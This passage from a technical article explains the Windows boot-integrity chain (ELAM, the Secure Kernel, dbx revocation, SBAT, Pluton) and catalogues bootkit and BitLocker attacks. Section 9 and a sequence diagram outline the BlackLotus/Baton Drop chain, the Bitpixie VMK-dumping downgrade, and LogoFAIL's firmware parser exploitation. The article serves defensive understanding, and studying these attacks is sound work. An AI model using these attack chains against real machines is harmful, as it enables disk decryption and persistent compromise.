&lt;p&gt;Trusted Boot has signed every kernel-mode binary along the path. Then what? The chain still has to outlive the boot.&lt;/p&gt;

A specially-signed driver class introduced in Windows 8 (2012) that loads as the *first* boot-start driver -- ahead of every other boot-start driver -- and classifies each subsequent boot-start driver as *Good*, *Bad*, *Unknown*, or *BadButCritical* before the operating-system loader allows it to load [@ms-elam, @ms-elam-driver-requirements]. ELAM&apos;s classification influences whether Windows loads the driver. The ELAM driver itself is a Microsoft-signed binary in the `Early-Launch` service-start group and is itself measured into the SRTM chain; the user-mode anti-malware service that consumes its classification events runs as a Protected Process Light (PPL).
&lt;p&gt;ELAM exists for a specific reason. The boot-start group includes anti-malware, device, and disk drivers that have to load before the rest of the operating system. Before Windows 8, those drivers all loaded in an undefined order, with no anti-malware product running yet. A bootkit that survived the kernel&apos;s signature check (or a driver that was signed but malicious) had a window in which nothing was watching. ELAM closed that window by ordering one driver -- a Microsoft-signed AM driver -- as the first boot-start driver, and giving it the right to classify those drivers as they loaded [@ms-elam]. ELAM is itself a boot-start driver; the Microsoft documentation specifies the INF requirement plainly: &quot;An ELAM Driver advertises its group as &apos;Early-Launch&apos;&quot; [@ms-elam-driver-requirements]. The associated user-mode anti-malware service runs as a Protected Process Light (PPL), so even SYSTEM-privileged user-mode code cannot inject into it [@ms-elam, @app-identity-sibling].The classification surface ELAM exposes is the four-element set Good / Bad / Unknown / BadButCritical, enumerated in Microsoft&apos;s &lt;code&gt;BDCB_CLASSIFICATION&lt;/code&gt; reference (ntddk.h) as &lt;code&gt;BdCbClassificationKnownGoodImage&lt;/code&gt;, &lt;code&gt;BdCbClassificationKnownBadImage&lt;/code&gt;, &lt;code&gt;BdCbClassificationUnknownImage&lt;/code&gt;, and &lt;code&gt;BdCbClassificationKnownBadImageBootCritical&lt;/code&gt; (the ELAM driver requirements page itself only enumerates three classes in prose; the fourth lives in the enum reference) [@ms-elam-driver-requirements]. The fourth category exists because some drivers are required for the system to boot; the AM driver&apos;s verdict on those is advisory rather than blocking. Defender ships the ELAM driver in Windows; Microsoft&apos;s interface allows third-party AM products to ship their own [@ms-elam].&lt;/p&gt;
&lt;p&gt;The kernel itself does the next set of jobs. &lt;code&gt;ntoskrnl.exe&lt;/code&gt; initialises memory protections and DMA defences. Kernel DMA Protection enables the IOMMU (Intel VT-d or AMD-Vi) so that PCIe peripherals either DMA only to memory their compatible driver has assigned (DMA-Remapping-compatible drivers, enumerated and started normally) or are blocked from starting and performing DMA entirely until an authorised user signs in or unlocks the screen (DMA-Remapping-incompatible drivers, the user-presence-gated default); both regimes block the drive-by-DMA pattern that targets arbitrary kernel memory and defend against malicious Thunderbolt peripherals [@ms-kernel-dma-protection]. The Driver Block List, enforced at code-integrity load time, refuses to load a recognised set of vulnerable signed drivers (the canonical example is &lt;em&gt;gdrv2.sys&lt;/em&gt;); details in this article&apos;s App Identity sibling [@app-identity-sibling]. HVCI (Hypervisor-Enforced Code Integrity, also called Memory Integrity) is loaded inside the Secure Kernel and enforces W^X on all kernel-mode memory; details in the Secure Kernel sibling [@secure-kernel-sibling].&lt;/p&gt;
&lt;p&gt;Then the Secure Kernel comes up. &lt;code&gt;securekernel.exe&lt;/code&gt; and &lt;code&gt;skci.dll&lt;/code&gt; initialise in Virtual Trust Level 1 -- a Hyper-V-managed isolation domain that the normal Windows kernel in VTL0 cannot read or write. The first Trustlet is LSAIso, the isolated process Credential Guard uses to hold NTLM hashes and Kerberos tickets out of reach of any kernel-mode attacker [@secure-kernel-sibling]. Control returns to the normal kernel; the user-mode tail begins.&lt;/p&gt;

flowchart TD
    WL[&quot;winload.efi&quot;] --&amp;gt; NT[&quot;ntoskrnl.exe (VTL0)&quot;]
    NT --&amp;gt; SK[&quot;securekernel.exe (VTL1)&quot;]
    SK --&amp;gt; LSA[&quot;LSAIso (Credential Guard Trustlet)&quot;]
    NT --&amp;gt; ELAM[&quot;ELAM driver&quot;]
    ELAM --&amp;gt; BS[&quot;boot-start drivers (classified by ELAM)&quot;]
    BS --&amp;gt; SMSS[&quot;smss.exe&quot;]
    SMSS --&amp;gt; WI[&quot;wininit.exe&quot;]
    WI --&amp;gt; WL2[&quot;winlogon.exe&quot;]
    WL2 --&amp;gt; UI[&quot;userinit.exe -&amp;gt; explorer.exe&quot;]
&lt;p&gt;The user-mode tail is not security-cryptographic per se. SMSS (the Session Manager) loads system DLLs and starts the first Win32 subsystem session. &lt;code&gt;wininit.exe&lt;/code&gt; initialises the LSA, the Service Control Manager, and the Local Session Manager. &lt;code&gt;winlogon.exe&lt;/code&gt; paints the credential UI, calls into Windows Hello [@no-secrets-to-steal-sibling] if applicable, and authenticates the user. &lt;code&gt;userinit.exe&lt;/code&gt; runs the logon scripts and launches &lt;code&gt;explorer.exe&lt;/code&gt; [@ms-trusted-boot]. From the boot-integrity perspective, &lt;code&gt;userinit&lt;/code&gt; is the moment the static-time guarantees of Trusted Boot end and the runtime defences -- Defender, EDR, attestation -- take over.&lt;/p&gt;
&lt;p&gt;We have walked the chain end to end. The next question is: when did this chain &lt;em&gt;actually start working&lt;/em&gt;?&lt;/p&gt;
&lt;h2&gt;8. The breakthroughs that made the chain land (2014-2024)&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Secure Boot existed&lt;/em&gt; in 2012. &lt;em&gt;Secure Boot worked&lt;/em&gt; (in the sense of defending most of what it claims to defend) only after roughly a decade of operational fixes that almost nobody outside Microsoft and a handful of OEMs ever wrote about. Four breakthroughs deserve naming. The matrix below collates them by &lt;em&gt;layer fixed&lt;/em&gt; and &lt;em&gt;fix-delivery vehicle&lt;/em&gt; before the prose treatments that follow.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Breakthrough&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Layer it fixed&lt;/th&gt;
&lt;th&gt;Fix-delivery vehicle&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;B1&lt;/td&gt;
&lt;td&gt;PCR[7] becomes the canonical BitLocker seal target&lt;/td&gt;
&lt;td&gt;~2014-2016&lt;/td&gt;
&lt;td&gt;Sealing brittleness; PCR[0..4] churn vs. firmware-revision cadence&lt;/td&gt;
&lt;td&gt;Windows servicing + BitLocker policy default change [@syss-bitpixie, @ms-system-guard]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B2&lt;/td&gt;
&lt;td&gt;Forced retirement of the Microsoft UEFI CA 2011&lt;/td&gt;
&lt;td&gt;May 2023 - June 2026&lt;/td&gt;
&lt;td&gt;Revocation gap (BlackLotus / Baton Drop)&lt;/td&gt;
&lt;td&gt;KB5025885 / CVE-2023-24932 multi-year, opt-in dbx push and CA-2023 enrolment [@kb5025885]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B3&lt;/td&gt;
&lt;td&gt;Secure Kernel becomes the launch destination&lt;/td&gt;
&lt;td&gt;Win10 2015 - Win11 2021&lt;/td&gt;
&lt;td&gt;&quot;Kernel signed&quot; is insufficient (TDL-4 lesson)&lt;/td&gt;
&lt;td&gt;OS feature ship and WHCP requirement; HVCI / Driver Block List default-on by 2024 [@ms-trusted-boot, @secure-kernel-sibling]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B4&lt;/td&gt;
&lt;td&gt;Pluton arrives as a Microsoft-firmware-authored RoT&lt;/td&gt;
&lt;td&gt;Nov 2020 announcement; Q1 2022 first silicon&lt;/td&gt;
&lt;td&gt;LPC/SPI bus-sniffing class against discrete TPMs; OEM patch-cadence latency for fTPM/PTT firmware&lt;/td&gt;
&lt;td&gt;Windows-Update-delivered Pluton firmware (alongside UEFI capsule), Rust-based on 2024+ AMD/Intel parts [@ms-pluton]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The first row is operational, not architectural: PCR[7] becoming the canonical BitLocker seal target, somewhere between Windows 8.1 and Windows 10 1607 [@syss-bitpixie, @ms-system-guard]. Before PCR[7], BitLocker sealed against PCR[0..4]: firmware code, platform configuration, option ROMs, option-ROM configuration, and boot-manager hashes. Every UEFI update -- and on real fleets they happen monthly -- changed PCR[0..4] and forced BitLocker into recovery, which forced an IT staffer to find the recovery key, which was annoying enough to make people turn BitLocker off. PCR[7] sealing decoupled the BitLocker protector from the firmware-revision churn and made Measured Boot durable in practice. This is the operational fix that made Measured Boot actually worth running on a fleet of thousands of laptops with monthly UEFI capsule updates.&lt;/p&gt;
&lt;p&gt;The second row is the forced retirement of the Microsoft UEFI CA 2011, which began in May 2023 with KB5025885 and CVE-2023-24932 and is on track to complete in late 2026 [@kb5025885]. This was the first serious dbx housekeeping in a decade. The relevant point: the fix had to be a &lt;em&gt;programme&lt;/em&gt;, not a hotfix, because dbx is too small to handle a one-shot revocation of a CA-rooted set without bricking either some Linux dual-boots or some Windows machines. The CA-2023 rollout phases the work across four years.&lt;/p&gt;
&lt;p&gt;The third was VBS and the Secure Kernel becoming the launch target the boot chain was actually defending. Without the Secure Kernel as a destination, Trusted Boot&apos;s guarantee ended at &quot;the kernel is signed&quot;, which TDL-4 had already shown was insufficient -- a signed kernel is of limited use if the SYSTEM-privileged user-mode code that follows can rewrite kernel memory through a vulnerable signed driver. The Secure Kernel arrived in Windows 10 1507 (2015) and matured into its enforced-by-default form in Windows 11 (2021), at which point the chain had a hardware-isolated destination that even a SYSTEM-level attacker could not reach without a hypervisor exploit [@secure-kernel-sibling].&lt;/p&gt;
&lt;p&gt;The fourth is still landing. Pluton, the cryptoprocessor whose firmware Microsoft (not the OEM) ships and updates, was announced in November 2020 and reached its first silicon -- AMD Ryzen 6000 -- in Q1 2022 [@ms-pluton]. Pluton is not yet ubiquitous, and its Secure Boot story is pending: as of 2026, Pluton ships as a TPM 2.0 implementation [@ms-pluton-as-tpm], not as a replacement verifier. Section 10 unpacks why the Microsoft-firmware-on-silicon-Microsoft-doesnt-own model matters more than the part numbers do.&lt;/p&gt;
&lt;p&gt;These were the operational fixes. The architectural breaks they were responding to are the next section.&lt;/p&gt;
&lt;h2&gt;9. The boot-chain attacks that actually worked&lt;/h2&gt;
&lt;p&gt;There has never been a public Secure Boot attack that broke the cryptographic primitive. Every successful attack has exploited the same gap: between fixing a vulnerability and revoking the signed binaries that carried it. The CVE numbers change. The structure does not.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Scope note: LoJax (ESET, September 2018) was the first real-world UEFI rootkit deployed in the wild, but it operates at the SPI flash layer -- below Secure Boot&apos;s signature verification chain -- and is therefore outside the scope of this table. The table focuses on attacks on the Secure Boot signature-enforcement chain itself.&lt;/em&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Rung broken&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;th&gt;dbx state at disclosure&lt;/th&gt;
&lt;th&gt;Fix path&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ESPecter&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;ESP-resident bootmgr replacement&lt;/td&gt;
&lt;td&gt;Secure Boot disabled&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Enable Secure Boot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FinSpy UEFI&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;bootmgfw.efi replaced on ESP&lt;/td&gt;
&lt;td&gt;Secure Boot disabled&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Enable Secure Boot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BlackLotus / CVE-2022-21894 (Baton Drop)&lt;/td&gt;
&lt;td&gt;2022-23&lt;/td&gt;
&lt;td&gt;Signed-but-vulnerable older bootmgfw&lt;/td&gt;
&lt;td&gt;Patched but unrevoked old binaries&lt;/td&gt;
&lt;td&gt;Old binaries not revoked&lt;/td&gt;
&lt;td&gt;dbx update via KB5025885&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bitpixie / CVE-2023-21563&lt;/td&gt;
&lt;td&gt;2022-24&lt;/td&gt;
&lt;td&gt;PXE soft-reboot leaks BitLocker VMK&lt;/td&gt;
&lt;td&gt;TPM-only BitLocker; LAN + keyboard&lt;/td&gt;
&lt;td&gt;n/a (no signature break)&lt;/td&gt;
&lt;td&gt;Pre-boot PIN; KB5025885&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LogoFAIL / CVE-2023-39539 et al.&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;DXE-phase image-parser RCE&lt;/td&gt;
&lt;td&gt;UEFI logo customisation accepting attacker BMP&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;OEM UEFI updates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bootkitty&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;Self-signed PoC; Secure Boot disabled or LogoFAIL&lt;/td&gt;
&lt;td&gt;Linux target&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Enable Secure Boot; patch LogoFAIL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WinRE / CVE-2024-20666 family&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;Recovery Environment downgrade&lt;/td&gt;
&lt;td&gt;TPM-only BitLocker; reachable WinRE&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Servicing stack updates&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;ESPecter (ESET, October 2021) [@eset-especter] is the simplest case. It is an ESP-resident bootkit that bypasses Driver Signature Enforcement to load its own unsigned kernel driver -- but only on systems with Secure Boot disabled. ESPecter is in the table to make the category visible: the ESP is a writable FAT partition with no signature on the contents, and any malware that can write to the ESP and persuade the firmware to boot from a different &lt;code&gt;bootmgfw&lt;/code&gt; path can win on a non-Secure-Boot system. The fix is to turn Secure Boot on.&lt;/p&gt;
&lt;p&gt;FinSpy (Kaspersky, September 2021) [@kaspersky-finspy] is the same attack family carrying an actual nation-state-grade payload. Kaspersky&apos;s GReAT analysis names the mechanism plainly: &quot;All machines infected with the UEFI bootkit had the Windows Boot Manager (&lt;code&gt;bootmgfw.efi&lt;/code&gt;) replaced with a malicious one.&quot; The malicious &lt;code&gt;bootmgfw&lt;/code&gt; injected code into &lt;code&gt;winlogon.exe&lt;/code&gt; for persistence. Again, Secure Boot disabled was the precondition. FinSpy was the proof that the ESP-resident category had real-world tradecraft attached, not just academic interest.&lt;/p&gt;
&lt;p&gt;BlackLotus (advertised on hacking forums from at least October 2022 [@eset-blacklotus]; ESET writeup 1 March 2023) is the case that defines the modern era [@eset-blacklotus, @wack0-batondrop]. BlackLotus does not disable Secure Boot. It chain-loads a legitimately-signed but vulnerable older &lt;code&gt;bootmgfw.efi&lt;/code&gt; revision. The vulnerability is CVE-2022-21894, nicknamed &lt;em&gt;Baton Drop&lt;/em&gt;: an older boot manager honoured a &lt;code&gt;truncatememory&lt;/code&gt; setting that removed blocks of memory containing serialised data structures from the memory map. The Wack0 PoC repository describes the primitive: &quot;Windows Boot Applications allow the truncatememory setting to remove blocks of memory containing &apos;persistent&apos; ranges of serialised data from the memory map, leading to Secure Boot bypass&quot; [@wack0-batondrop]. The chain: boot the legitimately-signed older bootmgfw; trigger Baton Drop; install a malicious SiPolicy that disables further checks; load an unsigned kernel driver; persistently disable HVCI, BitLocker, and Defender from below the trusted-boot horizon. Microsoft&apos;s incident-response guide for BlackLotus enumerates six classes of detection artefact: recently-written ESP files, staging directories, registry entries, event-log evidence of policy changes, network indicators, and BCD-log modifications [@ms-blacklotus-guidance]. The NSA published a mitigation guide on 22 June 2023 [@nsa-blacklotus]. ESET&apos;s epitaph is the article&apos;s recurring quote:&lt;/p&gt;

Exploitation is still possible as the affected, validly signed binaries have still not been added to the [UEFI revocation list]. -- Martin Smolar, ESET, March 2023 [@eset-blacklotus]

sequenceDiagram
    participant Attacker
    participant ESP as EFI System Partition
    participant FW as UEFI firmware
    participant BMGR as bootmgfw (older signed)
    participant OS as Windows kernel
    Attacker-&amp;gt;&amp;gt;ESP: drop legit but old signed bootmgfw
    FW-&amp;gt;&amp;gt;BMGR: LoadImage() -- signature OK, hash NOT in dbx
    Attacker-&amp;gt;&amp;gt;BMGR: trigger CVE-2022-21894 (truncatememory)
    BMGR-&amp;gt;&amp;gt;BMGR: install malicious SiPolicy
    BMGR-&amp;gt;&amp;gt;OS: load unsigned driver
    OS-&amp;gt;&amp;gt;OS: disable HVCI, BitLocker, Defender
&lt;p&gt;The &quot;disables HVCI / BitLocker / Defender from below the trusted-boot horizon&quot; framing in the caption is verbatim from the ESET disclosure and is reinforced by Microsoft&apos;s own incident-response guide [@eset-blacklotus, @ms-blacklotus-guidance].&lt;/p&gt;
&lt;p&gt;Bitpixie / CVE-2023-21563 [@neodyme-bitpixie, @syss-bitpixie] is BlackLotus&apos; twin in BitLocker space. The vulnerability was discovered by &lt;code&gt;Rairii&lt;/code&gt; in August 2022; Thomas Lambertz of Neodyme published a public PoC at 38C3 in December 2024. The mechanism is a downgrade. The attacker boots the target machine into Windows&apos; PXE network-recovery soft-reboot path, which loads a Microsoft-signed but older &lt;code&gt;bootmgfw.efi&lt;/code&gt; revision. That older revision does not erase the BitLocker VMK from physical memory before the PXE soft-reboot hands off, leaving the VMK in RAM where the chained payload (a signed Linux PE or downgraded WinPE) can dump it. The combination of TPM-only BitLocker (no pre-boot PIN), a Microsoft-Account-defaulted Windows 11 install (which biases toward TPM-only encryption), and physical access to a network port and keyboard, decrypts the disk in minutes. Lambertz&apos; framing: &quot;All an attacker needs is the ability to plug in a LAN cable and keyboard to decrypt the disk&quot; [@neodyme-bitpixie]. Bitpixie does not break Secure Boot. It exploits the same operational invariant -- old-but-signed binaries still validate -- in a different protection domain.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; TPM-only BitLocker is no longer a defensible default on Windows 11 once Bitpixie&apos;s PoC is public; the attack reduces to a LAN cable and a keyboard. See Section 11&apos;s &lt;code&gt;Replace TPM-only BitLocker&lt;/code&gt; bullet for the pre-boot-factor fix list [@neodyme-bitpixie, @kb5025885].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Bootkitty (ESET, 27 November 2024) [@eset-bootkitty] closes a symmetry. Twelve years after Andrea Allievi&apos;s September 2012 PoC -- the first UEFI bootkit designed for Windows 8 [@theregister-allievi] -- Bootkitty is the first UEFI bootkit aimed at Linux. Bootkitty was uploaded as a self-signed PoC, so on systems with Secure Boot enabled, it does not load unless the attacker&apos;s certificate has been enrolled in the Machine Owner Key (MOK) list -- either by a user via &lt;code&gt;mokutil&lt;/code&gt; (the ordinary Linux path), by a prior compromise enrolling the cert, or by chaining LogoFAIL (CVE-2023-40238) to inject a rogue MOK certificate from a malicious BMP, as Binarly demonstrated [@binarly-logofail-bootkitty]. Bootkitty patches kernel-image-integrity functions and pre-loads ELF binaries via &lt;code&gt;init&lt;/code&gt;. ESET later updated the attribution: an analysis posted in early December 2024 traced the build to a Korean Best of the Best (BoB) student project. The structural lesson is platform-orthogonal -- Secure Boot&apos;s gaps live in the firmware and revocation surfaces, not in any one operating system.&lt;/p&gt;

The Allievi 2012 ITSEC PoC was *the first UEFI bootkit*, full stop -- a research artefact that demonstrated, on Windows 8, the same trick BootRoot had demonstrated on the Windows NT/2000/XP MBR seven years earlier. Twelve years later, Bootkitty is the first UEFI bootkit *for Linux*, also a research artefact. The arc closes a symmetry: UEFI&apos;s verifier is platform-agnostic, so its weaknesses are too. A LogoFAIL-style image-parser bug in DXE compromises Secure Boot whether the operating system above it is Windows or Ubuntu. The attacker community needed twelve years to apply the technique to the second platform, but only because the second platform&apos;s market share for boot-chain attacks was smaller, not because the verifier was structurally any safer.
&lt;p&gt;LogoFAIL (Binarly REsearch, Black Hat EU 2023; CVE-2023-39539, CVE-2023-40238, CVE-2023-5058; advisory BRLY-2023-006) is the most architectural of the breaks because it compromises the verifier itself. The DXE phase parses a customisable boot logo image -- the OEM splash screen displayed on power-on -- and the parser is a piece of firmware code accepting an attacker-controlled input. Binarly demonstrated parser bugs in the BMP, GIF, JPEG, PCX, and TGA decoders shipped in reference code by all three major Independent BIOS Vendors -- AMI, Insyde, and Phoenix -- across roughly six hundred enterprise device models. A successful exploit gives the attacker code execution at the DXE phase, which is &lt;em&gt;below&lt;/em&gt; Secure Boot&apos;s &lt;code&gt;LoadImage()&lt;/code&gt; verifier. From DXE, the attacker can do whatever they want before the operating-system loader runs. Bootkitty later carried a LogoFAIL exploit (CVE-2023-40238) to inject a rogue MOK certificate from a malicious BMP, demonstrating the chain end to end [@binarly-logofail-bootkitty].&lt;/p&gt;
&lt;p&gt;Finally, the WinRE / &lt;code&gt;ReAgent.xml&lt;/code&gt; downgrade family (CVE-2024-20666 and successors) is the smaller cousin of the bigger story [@nvd-cve-2024-20666]. The Recovery Environment is a Windows partition with its own boot path; older WinRE images that contain unrevoked vulnerable &lt;code&gt;bootmgr.efi&lt;/code&gt; revisions can be persuaded to mount the encrypted volume under attacker control. The attack does not break the Secure Boot chain; it routes around it. The point of including it in this catalogue: it is another instance of the dbx-revocation-by-hash limit. As long as an older signed binary exists and is reachable, Secure Boot&apos;s verifier will validate it.&lt;/p&gt;
&lt;p&gt;Every attack here exploits the same operational invariant: the gap between &lt;em&gt;patched&lt;/em&gt; and &lt;em&gt;revoked&lt;/em&gt; is wide, and dbx is too small to close it. The next section examines whether anything can.&lt;/p&gt;
&lt;h2&gt;10. Theoretical limits, open problems, and the Pluton pivot&lt;/h2&gt;
&lt;p&gt;If every break has been operational, why has nobody fixed the operations? Because the operational bounds are themselves theoretical.&lt;/p&gt;
&lt;p&gt;Six structural limits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The verifier-of-verifiers regress.&lt;/strong&gt; Secure Boot&apos;s verifier is firmware code that itself must be trusted. Boot Guard and AMD PSB push that root one rung deeper, into silicon ROM and OTP fuses [@ioactive-psb, @wp-txt]. Pluton arguably pushes it one rung deeper still, into silicon Microsoft directly updates. There is no software-only bottom turtle. Every architecture in the field has &lt;em&gt;some&lt;/em&gt; layer that is trusted because there is no further layer to which trust can be deferred. The engineering question is &lt;em&gt;which party&lt;/em&gt; owns that layer -- OEM, Intel, AMD, or Microsoft via Pluton -- and &lt;em&gt;on whose update cadence&lt;/em&gt; the layer can be patched. IOActive&apos;s 2024 review of AMD PSB found that &quot;various major vendors fail to&quot; configure PSB correctly [@ioactive-psb], which is the kind of operational failure mode no cryptographic primitive can fix.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why dbx revocation is hard.&lt;/strong&gt; dbx is small, shared with Linux, vendor-implemented, and a brick-risk if mismanaged. The list stayed nearly empty for a decade until BlackLotus forced KB5025885&apos;s multi-year program [@nvd-cve-2023-24932]. SBAT (Secure Boot Advanced Targeting), the partial answer in the rhboot/shim project [@sbat-shim], revokes by &lt;em&gt;generation number&lt;/em&gt; rather than by image hash. SBAT works by embedding a CSV-formatted vendor-and-component-version table in every shim-signed binary; when the &lt;code&gt;SbatLevel&lt;/code&gt; UEFI variable records &quot;minimum acceptable shim generation is 4&quot;, shim refuses every older shim, which still hashes correctly but is too old. SBAT collapses tens of revocation events that would each consume hundreds of bytes of dbx into a single small metadata bump. The UEFI Forum has, since 2024, deferred to the canonical Microsoft-managed &lt;code&gt;secureboot_objects&lt;/code&gt; GitHub repository [@ms-secureboot-objects] as the source of truth for KEK, db, and dbx contents.&lt;/p&gt;

A revocation scheme designed by the rhboot/shim project to address dbx capacity exhaustion. Instead of revoking each vulnerable signed binary by Authenticode hash (which consumes ~32 bytes of dbx per binary), SBAT revokes by *generation number*: each signed component carries a CSV-formatted version table; shim compares it against a minimum generation recorded in the `SbatLevel` UEFI variable and refuses older builds, without consuming dbx capacity (firmware itself still enforces only db and dbx). SBAT is the project&apos;s structural answer to the cohort-revocation problem the §4 Sidenote quantifies.
&lt;p&gt;The SBAT generation-number scheme is also the model the Microsoft UEFI CA 2023 rollout extends across the wider Windows install base. KB5025885&apos;s mitigation strategy combines a small set of dbx hash revocations with a CA rotation, because no single mechanism by itself can revoke a decade&apos;s worth of signed bootloaders within the dbx storage budget [@kb5025885, @sbat-shim].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The signed-but-vulnerable problem.&lt;/strong&gt; As long as Microsoft-signed bootloaders with known flaws exist on the install media of any production Windows installation, Secure Boot must revoke by hash, by SVN, by SiPolicy, or by certificate -- each with collateral damage. Hash revocation does not cover binaries the attacker has not yet seen. SVN revocation forces a rebuild of every signed binary across the install base. SiPolicy revocation depends on the SiPolicy update reaching every machine. CA rotation breaks PXE recovery, recovery USBs, dual-boot Linux, and custom WinPE images.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Supply chain at the firmware level.&lt;/strong&gt; LogoFAIL, BMC-resident attacks against rack servers, Boot Guard key leaks (which OTP fuses cannot recover from), and OEM ME/PSP fuse misconfiguration are the categories Secure Boot cannot, by construction, defend against. The verifier sits above these layers; if these layers are compromised, the verifier is running on a base it cannot trust.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SRTM allowlist explosion.&lt;/strong&gt; N OEMs, M models, K firmware revisions; the allowlist of &quot;good SRTM measurements&quot; explodes; the blocklist is asymmetric in the attacker&apos;s favour. DRTM late-launch is the only known way to collapse the allowlist. As Microsoft puts it, &quot;DRTM lets the system freely boot into untrusted code initially, but shortly after launches the system into a trusted state&quot; [@ms-system-guard].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bus interception of discrete TPMs.&lt;/strong&gt; A discrete TPM on the LPC or SPI bus can be sniffed by a physical attacker. This is what motivates the move to Pluton: the TPM moves on-die, the bus disappears, and the BitLocker VMK no longer crosses a sniffable wire [@tpm-sibling].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every public Secure Boot break has exploited the gap between &lt;em&gt;patched&lt;/em&gt; and &lt;em&gt;revoked&lt;/em&gt;, not the cryptographic primitive. The dbx revocation half-life is the article&apos;s invariant. Pluton closes the cadence gap on the verifier-update side. It does not close the gap between patched and revoked.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;The Pluton pivot.&lt;/strong&gt; Pluton&apos;s pitch, for the boot chain, is to re-anchor both the verification root (long term) and the measurement endpoint (today) in silicon Microsoft can patch [@ms-pluton, @ms-pluton-as-tpm]. Pluton implements TPM 2.0 on the CPU die, so the existing measurement chain plugs in unchanged. What changes is the &lt;em&gt;firmware update cadence&lt;/em&gt; -- Pluton firmware ships through Windows Update as an additional channel alongside existing UEFI capsule updates; the key difference is that Microsoft authors and controls the firmware, and the Windows Update path enables Microsoft to deliver fixes independent of OEM release scheduling. The bus disappears: Pluton&apos;s interface is on-die--there is no external LPC or SPI bus crossing a package boundary that can be physically tapped, eliminating bus-sniffing as an attack class. And on 2024+ AMD and Intel parts, the Pluton firmware itself is written in Rust, addressing the memory-safety class of bugs that has historically dominated firmware CVEs [@ms-pluton].&lt;/p&gt;

flowchart LR
    subgraph Discrete[&quot;Discrete TPM&quot;]
        CPU1[&quot;CPU&quot;] -- LPC/SPI bus&lt;br /&gt;(sniffable) --&amp;gt; dTPM[&quot;dTPM (Infineon, STM)&quot;]
    end
    subgraph PlutonTopo[&quot;Pluton&quot;]
        CPU2[&quot;CPU&quot;] -- on-die mailbox --&amp;gt; PL[&quot;Pluton&quot;]
    end

The first reaction to &quot;dbx is too small&quot; is always: make it bigger. Three constraints stop that. First, dbx is implemented by hundreds of OEM firmware vendors against a UEFI specification floor; raising the floor would invalidate every shipped UEFI implementation. Second, dbx is shared between Windows, Linux, ESXi, and other operating systems, so growing it requires coordination across vendors with different incentives. Third -- and the real blocker -- the variable lives in NV-RAM with limited write cycles; a runaway revocation update can brick a board if the write fails partway through. The realistic fix is SBAT for image-version bumps and CA rotation for cohort-scale revocation. Both are partial.

Pluton&apos;s design only makes sense against the contrast with the two endpoints of the design space.&lt;p&gt;At one endpoint sits Apple. Apple authors the silicon, the Boot ROM, the iBoot bootloader, the kernel, and the Secure Enclave Processor&apos;s sepOS firmware. The Apple Boot ROM holds the Apple Root certificate authority public key directly; it verifies iBoot before iBoot loads anything else; on older A-series parts an additional Low-Level Bootloader stage is verified by the Boot ROM and in turn loads and verifies iBoot [@apple-boot]. The Secure Enclave Processor is &quot;a dedicated secure subsystem integrated into Apple SoC&quot;, isolated from the main processor and reachable only over a mailbox interface; sepOS is an L4 microkernel Apple ships and updates [@apple-sep]. Every stage of secure boot is signed by the same vendor that ships the operating system, and &quot;secure boot begins in silicon and builds a chain of trust through software&quot; [@apple-system]. The cadence is the iOS / iPadOS / macOS update cadence -- Apple-cadence -- because the same release pipeline ships everything from the bootloaders and sepOS up to the user-facing apps (the Boot ROM itself is silicon-resident mask ROM and is never field-updated).&lt;/p&gt;
